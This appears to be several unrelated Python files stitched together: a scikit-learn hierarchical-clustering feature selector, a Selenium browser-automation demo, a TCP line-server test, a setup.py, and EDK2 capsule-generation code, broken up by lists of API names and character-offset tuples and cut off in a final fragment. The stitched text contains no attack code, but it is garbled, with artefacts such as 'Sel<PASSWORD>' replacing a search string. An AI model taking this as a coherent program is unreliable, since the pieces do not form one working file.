corr = np.sqrt(chi2 / n)
return corr
def _calc_dist_matrix(self, X):
"""
Calculate distance matrix between each two features in X, each value is 1-phi_correlation
"""
X_df = pd.DataFrame.sparse.from_spmatrix(X)
X_corr_mat = X_df.corr(method=self._phi_coef)
feature_corr_dist_matrix = 1 - X_corr_mat
feature_corr_dist_matrix_condensed = ssd.squareform(feature_corr_dist_matrix)
self.dist_matrix = feature_corr_dist_matrix_condensed
def _corr_linkage(self, method='average'):
linkage = hierarchy.linkage(self.dist_matrix, method=method)
return linkage
def _hierarchical_clustering(self, linkage):
"""
Perform hierarchical clustering
Parameters
----------
linkage - linkage dendogram created by hierarchy.linkage(self.distance_matrix, method=method)
Returns
----------
a list of lists, each list represents a cluster and contains the indexes of features belonging
to the cluster
"""
# array of len(X) - array[i] is the cluster number to which sample i belongs
cluster_ids = hierarchy.fcluster(linkage, self.threshold, criterion='distance')
cluster_id_to_feature_idx = {}
for idx, cluster_id in enumerate(cluster_ids):
cluster_id_to_feature_idx.setdefault(cluster_id, []).append(idx)
return list(cluster_id_to_feature_idx.values())
def fit(self, X, y):
"""
Clusters the features (X columns) using self.dist_matrix and self.threshold, and selects a feature from each
cluster with the highest chi2 score versus y.
The attribute self.n_features_ represents the number of features selected (=number of clusters)
The attribute self.selected_features_ is a list of indexes that correspond to the selected features
"""
        if self.dist_matrix is None:
self._calc_dist_matrix(X)
linkage = self._corr_linkage()
clusters = self._hierarchical_clustering(linkage)
chi2_vals, __ = sklearn.feature_selection.chi2(X, y)
chi2_vals = pd.Series(chi2_vals)
# fitted attributes
self.n_features_ = X.shape[1]
self.selected_features_ = [chi2_vals[cluster].idxmax() for cluster in clusters]
self.clusters_ = clusters
print(f'threshold={self.threshold:.2f}, selected_features={len(self.selected_features_)}')
return self
def _get_support_mask(self):
"""
Get the boolean mask indicating which features are selected
Returns
----------
mask - boolean array of shape [# input features]
An element is True iff its corresponding feature is selected for
retention.
"""
# Checks if the estimator is fitted by verifying the presence of fitted attributes (ending with a trailing
# underscore) and otherwise raises a NotFittedError with the given message.
sklearn.utils.validation.check_is_fitted(self)
mask = np.zeros((self.n_features_, ), dtype=bool)
mask[self.selected_features_] = 1
return mask
def get_fs_pipeline(k, threshold, random_state=0):
"""
Creates feature selection pipeline
Parameters
----------
k - the k parameter for the SelectKBest features function
    threshold - clustering threshold for the hierarchical clustering
    random_state - random state for the RandomForestClassifier. Default value: 0
Returns
----------
pipeline - feature selection pipeline
"""
pipeline = Pipeline(steps=[('vectorize', CountVectorizer(lowercase=False, binary=True)),
('k_best', SelectKBest(score_func=sklearn.feature_selection.chi2, k=k)),
('cluster', SelectHierarchicalClustering(threshold=threshold)),
('rf', RandomForestClassifier(random_state=random_state))])
return pipeline
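# Hypothetical usage sketch (added for illustration; names and values are
# placeholders): the pipeline starts with a CountVectorizer, so it expects raw
# text documents and their labels.
#
#     pipeline = get_fs_pipeline(k=500, threshold=0.8)
#     pipeline.fit(train_texts, train_labels)
#     predictions = pipeline.predict(test_texts)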
| [
"pandas.Series",
"sklearn.utils.validation.check_is_fitted",
"scipy.spatial.distance.squareform",
"numpy.sqrt",
"scipy.stats.chi2_contingency",
"sklearn.feature_extraction.text.CountVectorizer",
"pandas.crosstab",
"sklearn.ensemble.RandomForestClassifier",
"sklearn.feature_selection.SelectKBest",
"numpy.zeros",
"scipy.cluster.hierarchy.linkage",
"pandas.DataFrame.sparse.from_spmatrix",
"sklearn.feature_selection.chi2",
"scipy.cluster.hierarchy.fcluster"
] | [((1112, 1129), 'pandas.crosstab', 'pd.crosstab', (['x', 'y'], {}), '(x, y)\n', (1123, 1129), True, 'import pandas as pd\n'), ((1239, 1256), 'numpy.sqrt', 'np.sqrt', (['(chi2 / n)'], {}), '(chi2 / n)\n', (1246, 1256), True, 'import numpy as np\n'), ((1453, 1489), 'pandas.DataFrame.sparse.from_spmatrix', 'pd.DataFrame.sparse.from_spmatrix', (['X'], {}), '(X)\n', (1486, 1489), True, 'import pandas as pd\n'), ((1641, 1681), 'scipy.spatial.distance.squareform', 'ssd.squareform', (['feature_corr_dist_matrix'], {}), '(feature_corr_dist_matrix)\n', (1655, 1681), True, 'import scipy.spatial.distance as ssd\n'), ((1812, 1862), 'scipy.cluster.hierarchy.linkage', 'hierarchy.linkage', (['self.dist_matrix'], {'method': 'method'}), '(self.dist_matrix, method=method)\n', (1829, 1862), False, 'from scipy.cluster import hierarchy\n'), ((2422, 2487), 'scipy.cluster.hierarchy.fcluster', 'hierarchy.fcluster', (['linkage', 'self.threshold'], {'criterion': '"""distance"""'}), "(linkage, self.threshold, criterion='distance')\n", (2440, 2487), False, 'from scipy.cluster import hierarchy\n'), ((3345, 3381), 'sklearn.feature_selection.chi2', 'sklearn.feature_selection.chi2', (['X', 'y'], {}), '(X, y)\n', (3375, 3381), False, 'import sklearn\n'), ((3402, 3422), 'pandas.Series', 'pd.Series', (['chi2_vals'], {}), '(chi2_vals)\n', (3411, 3422), True, 'import pandas as pd\n'), ((4260, 4306), 'sklearn.utils.validation.check_is_fitted', 'sklearn.utils.validation.check_is_fitted', (['self'], {}), '(self)\n', (4300, 4306), False, 'import sklearn\n'), ((4323, 4364), 'numpy.zeros', 'np.zeros', (['(self.n_features_,)'], {'dtype': 'bool'}), '((self.n_features_,), dtype=bool)\n', (4331, 4364), True, 'import numpy as np\n'), ((1145, 1179), 'scipy.stats.chi2_contingency', 'chi2_contingency', (['confusion_matrix'], {}), '(confusion_matrix)\n', (1161, 1179), False, 'from scipy.stats import chi2_contingency\n'), ((4896, 4941), 'sklearn.feature_extraction.text.CountVectorizer', 'CountVectorizer', ([], {'lowercase': '(False)', 'binary': '(True)'}), '(lowercase=False, binary=True)\n', (4911, 4941), False, 'from sklearn.feature_extraction.text import CountVectorizer\n'), ((4986, 5045), 'sklearn.feature_selection.SelectKBest', 'SelectKBest', ([], {'score_func': 'sklearn.feature_selection.chi2', 'k': 'k'}), '(score_func=sklearn.feature_selection.chi2, k=k)\n', (4997, 5045), False, 'from sklearn.feature_selection import SelectKBest, SelectorMixin\n'), ((5181, 5230), 'sklearn.ensemble.RandomForestClassifier', 'RandomForestClassifier', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (5203, 5230), False, 'from sklearn.ensemble import RandomForestClassifier\n')] |
from bs4 import BeautifulSoup
import requests
import re
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.touch_actions import TouchActions
from selenium.common.exceptions import TimeoutException
URL = 'https://shopping.thinkwithgoogle.com'
EXAMPLES = ["Demonstrate unexpected use-case",
"Demonstrate google search",
"Demonstrate search on thinkwithgoogle",
"Demonstrate search on WebDriverWait",
"Demonstrate search on thinkwithgoogle search result",
"Download and extract additional data",
"Demonstrate maximizing screen",
"Demonstrate mouse actions for Chrome",
"Demonstrate navigation"]
def run(input, URL):
if(input == 0):
content = requests.get(URL)
soup = BeautifulSoup(content.text,'html.parser')
print(soup.prettify()) # Print row with HTML formatting
elif(input == 1):
driver = webdriver.Safari()
driver.get("https://www.google.com")
search = driver.find_element_by_name("q")
search.send_keys("Sel<PASSWORD>") # Google Search "Selenium"
search.submit()
elif(input == 2):
browser = webdriver.Safari()
browser.get(URL)
time.sleep(5)
search = browser.find_elements_by_id('subjectInput')[1]
        search.send_keys('Google Pixel 3') # Google Search "Google Pixel 3"
time.sleep(5)
search.send_keys(Keys.RETURN)
elif(input == 3):
browser = webdriver.Safari()
browser.maximize_window() # Required for the input tag visibility
browser.get('https://trends.google.com/trends/')
try: # proceed if element is found within 3 seconds otherwise raise TimeoutException
element = WebDriverWait(browser, 3).until(EC.presence_of_element_located((By.ID, 'input-254')))
except TimeoutException:
print("Loading took too much time!")
search = browser.find_elements(By.ID,'input-254')[0]
search.send_keys('Google Pixel 3')
elif(input == 4):
browser = webdriver.Safari()
browser.get(URL) # with visibility search
time.sleep(2)
search = returnVisibleElement(browser.find_elements_by_id('subjectInput'))
search.send_keys('Google Pixel 3')
time.sleep(2)
search.send_keys(Keys.ENTER)
elif(input == 5):
browser = webdriver.Safari()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
search = returnVisibleElement(browser.find_elements_by_id('subjectInput'))
search.send_keys('Google Pixel 3')
time.sleep(2)
search.send_keys(Keys.ENTER)
time.sleep(2)
browser.find_element_by_class_name('si-button-data download-all').click()
data = browser.find_element_by_class_name('content content-breakpoint-gt-md')
dataList = data.find_elements_by_tag_name('li')
for item in dataList:
text = item.text
print(text)
elif(input == 6):
browser = webdriver.Safari()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
element_to_hover_over = returnVisibleElement(browser.find_elements_by_xpath("//i[@class='material-icons'][contains(./text(),'help')]"))
elif(input == 7):
browser = webdriver.Chrome()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
element_to_hover_over = returnVisibleElement(browser.find_elements_by_xpath("//i[@class='material-icons'][contains(./text(),'help')]"))
        ## ActionChains are not supported in Safari but will work on other browsers
## https://github.com/seleniumhq/selenium-google-code-issue-archive/issues/4136
ActionChains(browser).click(element_to_hover_over).perform()
TouchActions(browser).long_press(element_to_hover_over).perform()
elif(input == 8):
browser = webdriver.Safari()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
search = returnVisibleElement(browser.find_elements_by_id('subjectInput'))
search.send_keys('Google Pixel 3')
time.sleep(2)
search.send_keys(Keys.ENTER)
time.sleep(2)
data = browser.find_element_by_class_name('content content-breakpoint-gt-md')
dataList = data.find_elements_by_tag_name('li')
for item in dataList:
text = item.text
print(text)
browser.back()
print('\n' * 5) # For convenient visual
def returnVisibleElement(listOfInputElements):
for element in listOfInputElements:
if element.is_displayed():
return element
def printSelection():
print('Press:')
for i in range(0, len(EXAMPLES)):
print('',i,'to',EXAMPLES[i], sep = ' ')
if __name__ == '__main__':
while(True):
printSelection()
choice = input('Enter choice: ')
try:
choice = int(choice)
except ValueError:
print('Invalid input, stop program')
break
if(choice not in range(0,9)):
print('Invalid input, stop program')
break
run(int(choice), URL)
| [
"selenium.webdriver.support.ui.WebDriverWait",
"selenium.webdriver.Safari",
"selenium.webdriver.Chrome",
"time.sleep",
"requests.get",
"bs4.BeautifulSoup",
"selenium.webdriver.common.action_chains.ActionChains",
"selenium.webdriver.common.touch_actions.TouchActions",
"selenium.webdriver.support.expected_conditions.presence_of_element_located"
] | [((1107, 1124), 'requests.get', 'requests.get', (['URL'], {}), '(URL)\n', (1119, 1124), False, 'import requests\n'), ((1140, 1182), 'bs4.BeautifulSoup', 'BeautifulSoup', (['content.text', '"""html.parser"""'], {}), "(content.text, 'html.parser')\n", (1153, 1182), False, 'from bs4 import BeautifulSoup\n'), ((1296, 1314), 'selenium.webdriver.Safari', 'webdriver.Safari', ([], {}), '()\n', (1312, 1314), False, 'from selenium import webdriver\n'), ((1568, 1586), 'selenium.webdriver.Safari', 'webdriver.Safari', ([], {}), '()\n', (1584, 1586), False, 'from selenium import webdriver\n'), ((1633, 1646), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (1643, 1646), False, 'import time\n'), ((1804, 1817), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (1814, 1817), False, 'import time\n'), ((1896, 1914), 'selenium.webdriver.Safari', 'webdriver.Safari', ([], {}), '()\n', (1912, 1914), False, 'from selenium import webdriver\n'), ((2501, 2519), 'selenium.webdriver.Safari', 'webdriver.Safari', ([], {}), '()\n', (2517, 2519), False, 'from selenium import webdriver\n'), ((2597, 2610), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (2607, 2610), False, 'import time\n'), ((2745, 2758), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (2755, 2758), False, 'import time\n'), ((2221, 2273), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'EC.presence_of_element_located', (["(By.ID, 'input-254')"], {}), "((By.ID, 'input-254'))\n", (2251, 2273), True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((2836, 2854), 'selenium.webdriver.Safari', 'webdriver.Safari', ([], {}), '()\n', (2852, 2854), False, 'from selenium import webdriver\n'), ((3009, 3022), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (3019, 3022), False, 'import time\n'), ((3157, 3170), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (3167, 3170), False, 'import time\n'), ((3216, 3229), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (3226, 3229), False, 'import time\n'), ((2189, 2214), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['browser', '(3)'], {}), '(browser, 3)\n', (2202, 2214), False, 'from selenium.webdriver.support.ui import WebDriverWait\n'), ((3577, 3595), 'selenium.webdriver.Safari', 'webdriver.Safari', ([], {}), '()\n', (3593, 3595), False, 'from selenium import webdriver\n'), ((3750, 3763), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (3760, 3763), False, 'import time\n'), ((3948, 3966), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {}), '()\n', (3964, 3966), False, 'from selenium import webdriver\n'), ((4121, 4134), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (4131, 4134), False, 'import time\n'), ((4627, 4645), 'selenium.webdriver.Safari', 'webdriver.Safari', ([], {}), '()\n', (4643, 4645), False, 'from selenium import webdriver\n'), ((4800, 4813), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (4810, 4813), False, 'import time\n'), ((4948, 4961), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (4958, 4961), False, 'import time\n'), ((5007, 5020), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (5017, 5020), False, 'import time\n'), ((4452, 4473), 'selenium.webdriver.common.action_chains.ActionChains', 'ActionChains', (['browser'], {}), '(browser)\n', (4464, 4473), False, 'from selenium.webdriver.common.action_chains import ActionChains\n'), ((4521, 4542), 'selenium.webdriver.common.touch_actions.TouchActions', 'TouchActions', (['browser'], {}), '(browser)\n', (4533, 4542), False, 'from 
selenium.webdriver.common.touch_actions import TouchActions\n')] |
#!/usr/bin/env python3
#******************************************************************************
# (C) 2018, <NAME>, Austria *
# *
# The Space Python Library is free software; you can redistribute it and/or *
# modify it under under the terms of the MIT License as published by the *
# Massachusetts Institute of Technology. *
# *
# The Space Python Library is distributed in the hope that it will be useful, *
# but WITHOUT ANY WARRANTY; without even the implied warranty of *
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the MIT License *
# for more details. *
#******************************************************************************
# Unit Tests *
#******************************************************************************
import sys
from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR
import UTIL.SYS, UTIL.TASK, UTIL.TCP
#############
# constants #
#############
LINEBUFFERLEN = 256
###########
# classes #
###########
# =============================================================================
class TCPserver(UTIL.TCP.SingleClientServer):
"""Subclass of UTIL.TCP.SingleClientServer"""
# ---------------------------------------------------------------------------
def __init__(self, portNr):
"""Initialise attributes only"""
modelTask = UTIL.TASK.s_processingTask
UTIL.TCP.SingleClientServer.__init__(self, modelTask, portNr)
self.tcpLineBuffer = ""
# ---------------------------------------------------------------------------
def receiveCallback(self, socket, stateMask):
"""Callback when a client has send data"""
LOG("*** receiveCallback ***")
# read the next set of byte from the data socket
data = self.recv(LINEBUFFERLEN)
    if data is None:
# client is automatically disconnected
return
tcpLineBuffer = self.tcpLineBuffer
tcpLineBuffer += data.decode("ascii")
LOG("tcpLineBuffer: " + tcpLineBuffer)
# handle the input: extract the lines from the line buffer
lines = tcpLineBuffer.split("\n")
# the last line has to be handled in a special way and can not be
# processed directly
lastLine = lines[-1]
lines = lines[:-1]
if lastLine == "":
# read of the data was complete (incl. "\n")
pass
else:
# last line was cutt off and the rest should come with the next read
self.tcpLineBuffer = lastLine
for line in lines:
# remove a terminating "\r" for clients like telnet
if line[-1] == "\r":
line = line[:-1]
# terminate the client connection if exit has been entered (case insensitive)
upperLine = line.upper()
if (upperLine == "X") or (upperLine == "EXIT"):
LOG("Exit requested")
# send the OK response back to the client
retString = "OK\n"
self.send(retString.encode())
# terminate the client connection
        self.disconnectClient()
return
if (upperLine == "Q") or (upperLine == "QUIT"):
LOG("Quit requested")
# send the OK response back to the client
retString = "OK\n"
self.send(retString.encode())
# terminate the client connection
        self.disconnectClient()
sys.exit(0)
# delegate the input
      pstatus = self.processLine(line)
if pstatus == 0:
LOG("OK")
# send the OK response back to the TECO
retString = "OK\n";
self.send(retString.encode())
else:
LOG_ERROR(str(pstatus))
# set the Error response back to the client:
retString = "Error: execution failed (see log)!\n"
self.send(retString.encode())
# ---------------------------------------------------------------------------
def processLine(self, line):
"""Callback when a client has send a data line"""
LOG("line = " + line)
return 0
#############
# functions #
#############
# -----------------------------------------------------------------------------
def initConfiguration():
"""initialise the system configuration"""
UTIL.SYS.s_configuration.setDefaults([
["HOST", "127.0.0.1"],
["SERVER_PORT", "1234"]])
# -----------------------------------------------------------------------------
def createServer():
"""create the TCP server"""
server = TCPserver(portNr=int(UTIL.SYS.s_configuration.SERVER_PORT))
if not server.openConnectPort(UTIL.SYS.s_configuration.HOST):
sys.exit(-1)
# activate zyclic idle function
idleFunction()
# -----------------------------------------------------------------------------
def idleFunction():
UTIL.TASK.s_processingTask.createTimeHandler(1000, idleFunction)
LOG("--- idle ---")
########
# main #
########
if __name__ == "__main__":
# initialise the system configuration
initConfiguration()
# initialise the console handler
consoleHandler = UTIL.TASK.ConsoleHandler()
# initialise the model
modelTask = UTIL.TASK.ProcessingTask(isParent=True)
# register the console handler
modelTask.registerConsoleHandler(consoleHandler)
# create the TCP server
LOG("Open the TCP server")
createServer()
# start the tasks
LOG("start modelTask...")
modelTask.start()
| [
"UTIL.SYS.LOG",
"sys.exit"
] | [((5003, 5022), 'UTIL.SYS.LOG', 'LOG', (['"""--- idle ---"""'], {}), "('--- idle ---')\n", (5006, 5022), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((5412, 5438), 'UTIL.SYS.LOG', 'LOG', (['"""Open the TCP server"""'], {}), "('Open the TCP server')\n", (5415, 5438), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((5478, 5503), 'UTIL.SYS.LOG', 'LOG', (['"""start modelTask..."""'], {}), "('start modelTask...')\n", (5481, 5503), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((1987, 2017), 'UTIL.SYS.LOG', 'LOG', (['"""*** receiveCallback ***"""'], {}), "('*** receiveCallback ***')\n", (1990, 2017), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((2271, 2309), 'UTIL.SYS.LOG', 'LOG', (["('tcpLineBuffer: ' + tcpLineBuffer)"], {}), "('tcpLineBuffer: ' + tcpLineBuffer)\n", (2274, 2309), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((4176, 4197), 'UTIL.SYS.LOG', 'LOG', (["('line = ' + line)"], {}), "('line = ' + line)\n", (4179, 4197), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((4770, 4782), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (4778, 4782), False, 'import sys\n'), ((3070, 3091), 'UTIL.SYS.LOG', 'LOG', (['"""Exit requested"""'], {}), "('Exit requested')\n", (3073, 3091), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((3359, 3380), 'UTIL.SYS.LOG', 'LOG', (['"""Quit requested"""'], {}), "('Quit requested')\n", (3362, 3380), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((3579, 3590), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3587, 3590), False, 'import sys\n'), ((3689, 3698), 'UTIL.SYS.LOG', 'LOG', (['"""OK"""'], {}), "('OK')\n", (3692, 3698), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n')] |
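A minimal client for the line-based protocol above can be sketched as follows (hedged: the host and port are the defaults from initConfiguration, and this helper is not part of the original file):

# client sketch, assuming the default HOST/SERVER_PORT from initConfiguration
import socket

def send_command(command, host="127.0.0.1", port=1234):
  """Send one newline-terminated command and return the server's reply."""
  with socket.create_connection((host, port)) as sock:
    sock.sendall((command + "\n").encode("ascii"))
    return sock.recv(256).decode("ascii").strip()

if __name__ == "__main__":
  print(send_command("hello"))  # processLine() returns 0, so the server answers "OK"
  print(send_command("exit"))   # server answers "OK" and closes this client connection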
from setuptools import setup, find_packages
with open("README.md", 'r',encoding="utf-8") as f:
long_description = f.read()
setup(
name='LineBot',
version='0.1.0',
description='Simple-LINELIB',
long_description=long_description,
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/CyberTKR/Simple-LINELIB',
packages=find_packages(include=['CyberTK', 'CyberTK.*']),
install_requires=[
'httpx==0.19.0',
'requests',
'thrift',
'CyberTKAPI'
],
extras_require={'httpx': ['http2']}
)
| [
"setuptools.find_packages"
] | [((366, 413), 'setuptools.find_packages', 'find_packages', ([], {'include': "['CyberTK', 'CyberTK.*']"}), "(include=['CyberTK', 'CyberTK.*'])\n", (379, 413), False, 'from setuptools import setup, find_packages\n')] |
## @file
# generate capsule
#
# Copyright (c) 2007-2017, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Ffs
from GenFdsGlobalVariable import GenFdsGlobalVariable
import StringIO
from struct import pack
import os
from Common.Misc import SaveFileOnChange
import uuid
## base class for capsule data
#
#
class CapsuleData:
## The constructor
#
# @param self The object pointer
def __init__(self):
pass
## generate capsule data
#
# @param self The object pointer
def GenCapsuleSubItem(self):
pass
## FFS class for capsule data
#
#
class CapsuleFfs (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FvName = None
## generate FFS capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
FfsFile = self.Ffs.GenFfs()
return FfsFile
## FV class for capsule data
#
#
class CapsuleFv (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FvName = None
self.CapsuleName = None
## generate FV capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
if self.FvName.find('.fv') == -1:
if self.FvName.upper() in GenFdsGlobalVariable.FdfParser.Profile.FvDict.keys():
FvObj = GenFdsGlobalVariable.FdfParser.Profile.FvDict.get(self.FvName.upper())
FdBuffer = StringIO.StringIO('')
FvObj.CapsuleName = self.CapsuleName
FvFile = FvObj.AddToBuffer(FdBuffer)
FvObj.CapsuleName = None
FdBuffer.close()
return FvFile
else:
FvFile = GenFdsGlobalVariable.ReplaceWorkspaceMacro(self.FvName)
return FvFile
## FD class for capsule data
#
#
class CapsuleFd (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FdName = None
self.CapsuleName = None
## generate FD capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
if self.FdName.find('.fd') == -1:
if self.FdName.upper() in GenFdsGlobalVariable.FdfParser.Profile.FdDict.keys():
FdObj = GenFdsGlobalVariable.FdfParser.Profile.FdDict.get(self.FdName.upper())
FdFile = FdObj.GenFd()
return FdFile
else:
FdFile = GenFdsGlobalVariable.ReplaceWorkspaceMacro(self.FdName)
return FdFile
## AnyFile class for capsule data
#
#
class CapsuleAnyFile (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FileName = None
## generate AnyFile capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
return self.FileName
## Afile class for capsule data
#
#
class CapsuleAfile (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FileName = None
## generate Afile capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
return self.FileName
class CapsulePayload(CapsuleData):
'''Generate payload file, the header is defined below:
#pragma pack(1)
typedef struct {
UINT32 Version;
EFI_GUID UpdateImageTypeId;
UINT8 UpdateImageIndex;
UINT8 reserved_bytes[3];
UINT32 UpdateImageSize;
UINT32 UpdateVendorCodeSize;
UINT64 UpdateHardwareInstance; //Introduced in v2
} EFI_FIRMWARE_MANAGEMENT_CAPSULE_IMAGE_HEADER;
'''
def __init__(self):
self.UiName = None
self.Version = None
self.ImageTypeId = None
self.ImageIndex = None
self.HardwareInstance = None
self.ImageFile = []
self.VendorCodeFile = []
self.Certificate_Guid = None
self.MonotonicCount = None
self.Existed = False
self.Buffer = None
def GenCapsuleSubItem(self, AuthData=[]):
if not self.Version:
self.Version = '0x00000002'
if not self.ImageIndex:
self.ImageIndex = '0x1'
if not self.HardwareInstance:
self.HardwareInstance = '0x0'
ImageFileSize = os.path.getsize(self.ImageFile)
if AuthData:
            # the ImageFileSize needs to include the full authenticated info size, from the
            # first byte of MonotonicCount to the last byte of the certificate.
            # These 32 bytes are the MonotonicCount, dwLength, wRevision, wCertificateType and CertType
ImageFileSize += 32
VendorFileSize = 0
if self.VendorCodeFile:
VendorFileSize = os.path.getsize(self.VendorCodeFile)
#
# Fill structure
#
Guid = self.ImageTypeId.split('-')
Buffer = pack('=ILHHBBBBBBBBBBBBIIQ',
int(self.Version,16),
int(Guid[0], 16),
int(Guid[1], 16),
int(Guid[2], 16),
int(Guid[3][-4:-2], 16),
int(Guid[3][-2:], 16),
int(Guid[4][-12:-10], 16),
int(Guid[4][-10:-8], 16),
int(Guid[4][-8:-6], 16),
int(Guid[4][-6:-4], 16),
int(Guid[4][-4:-2], 16),
int(Guid[4][-2:], 16),
int(self.ImageIndex, 16),
0,
0,
0,
ImageFileSize,
VendorFileSize,
int(self.HardwareInstance, 16)
)
if AuthData:
Buffer += pack('QIHH', AuthData[0], AuthData[1], AuthData[2], AuthData[3])
Buffer += uuid.UUID(AuthData[4]).get_bytes_le()
#
# Append file content to the structure
#
ImageFile = open(self.ImageFile, 'rb')
Buffer += ImageFile.read()
ImageFile.close()
if self.VendorCodeFile:
VendorFile = open(self.VendorCodeFile, 'rb')
Buffer += VendorFile.read()
VendorFile.close()
self.Existed = True
return Buffer
| [
"GenFdsGlobalVariable.GenFdsGlobalVariable.ReplaceWorkspaceMacro",
"StringIO.StringIO",
"os.path.getsize",
"uuid.UUID",
"struct.pack",
"GenFdsGlobalVariable.GenFdsGlobalVariable.FdfParser.Profile.FvDict.keys",
"GenFdsGlobalVariable.GenFdsGlobalVariable.FdfParser.Profile.FdDict.keys"
] | [((5358, 5389), 'os.path.getsize', 'os.path.getsize', (['self.ImageFile'], {}), '(self.ImageFile)\n', (5373, 5389), False, 'import os\n'), ((2439, 2494), 'GenFdsGlobalVariable.GenFdsGlobalVariable.ReplaceWorkspaceMacro', 'GenFdsGlobalVariable.ReplaceWorkspaceMacro', (['self.FvName'], {}), '(self.FvName)\n', (2481, 2494), False, 'from GenFdsGlobalVariable import GenFdsGlobalVariable\n'), ((3282, 3337), 'GenFdsGlobalVariable.GenFdsGlobalVariable.ReplaceWorkspaceMacro', 'GenFdsGlobalVariable.ReplaceWorkspaceMacro', (['self.FdName'], {}), '(self.FdName)\n', (3324, 3337), False, 'from GenFdsGlobalVariable import GenFdsGlobalVariable\n'), ((5774, 5810), 'os.path.getsize', 'os.path.getsize', (['self.VendorCodeFile'], {}), '(self.VendorCodeFile)\n', (5789, 5810), False, 'import os\n'), ((6829, 6893), 'struct.pack', 'pack', (['"""QIHH"""', 'AuthData[0]', 'AuthData[1]', 'AuthData[2]', 'AuthData[3]'], {}), "('QIHH', AuthData[0], AuthData[1], AuthData[2], AuthData[3])\n", (6833, 6893), False, 'from struct import pack\n'), ((1996, 2048), 'GenFdsGlobalVariable.GenFdsGlobalVariable.FdfParser.Profile.FvDict.keys', 'GenFdsGlobalVariable.FdfParser.Profile.FvDict.keys', ([], {}), '()\n', (2046, 2048), False, 'from GenFdsGlobalVariable import GenFdsGlobalVariable\n'), ((2172, 2193), 'StringIO.StringIO', 'StringIO.StringIO', (['""""""'], {}), "('')\n", (2189, 2193), False, 'import StringIO\n'), ((3029, 3081), 'GenFdsGlobalVariable.GenFdsGlobalVariable.FdfParser.Profile.FdDict.keys', 'GenFdsGlobalVariable.FdfParser.Profile.FdDict.keys', ([], {}), '()\n', (3079, 3081), False, 'from GenFdsGlobalVariable import GenFdsGlobalVariable\n'), ((6916, 6938), 'uuid.UUID', 'uuid.UUID', (['AuthData[4]'], {}), '(AuthData[4])\n', (6925, 6938), False, 'import uuid\n')] |
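For illustration only (not part of the original BaseTools file), the fixed-size header packed by CapsulePayload.GenCapsuleSubItem above can be decoded with the same struct layout; the field names mirror EFI_FIRMWARE_MANAGEMENT_CAPSULE_IMAGE_HEADER:

# illustrative decoder for the packed payload header ('=' means standard sizes, no padding)
import struct

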